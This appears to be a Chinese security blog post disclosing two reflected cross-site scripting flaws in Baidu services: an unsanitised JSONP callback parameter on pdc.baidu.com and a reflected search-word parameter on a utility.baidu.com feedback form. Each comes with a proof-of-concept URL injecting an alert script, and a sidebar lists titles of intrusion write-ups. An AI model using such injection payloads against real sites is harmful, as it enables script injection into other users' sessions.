|
[组图]百度空间多处XSS漏洞续篇
继续我们的XSS之旅,先来看一个YY漏洞
XSS 5: 百度PDC CallBack XSS漏洞
baidu pdc的imstate从名字上来看似乎是用来查询IM在线情况的,正常情况下的一个请求大致如下:
| 以下是引用片段: http://pdc.baidu.com/imstate/?callback=IM_STATUS_CALLBACK&type=json&uids=testuser |
这个页面会返回一个json的值
IM_STATUS_CALLBACK({ })
但是在这里IM_STATUS_CALLBACK可以由用户控制,所以就能注入我们的恶意脚本
| 以下是引用片段: http://pdc.baidu.com/imstate/?callback=<script>alert(/XSS/)</script>&type=json&uids= |
XSS 6: 百度搜索用户反馈XSS
漏洞很简单,直接reflect
| 以下是引用片段: http://utility.baidu.com/quality/quality_form.php?word=“><script>alert(/Fvck+Baidu+XSS/);</script><” |
| 以下是引用片段: <body onload=”document.form1.requireddescription.focus()”> <form name=”form1″ method=”post” action=”quality_result.php” onSubmit=”return checkrequired(this)”> <input type=”hidden” name=”query” value=”\”><script>alert(/Fvck Baidu XSS/);</script><\”“> |
| 实例讲解跨站入侵攻防战之攻击篇 | 05-08 |
| 对偶偶娱乐分站服务器的安全检测 | 04-23 |
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |
您现在的位置: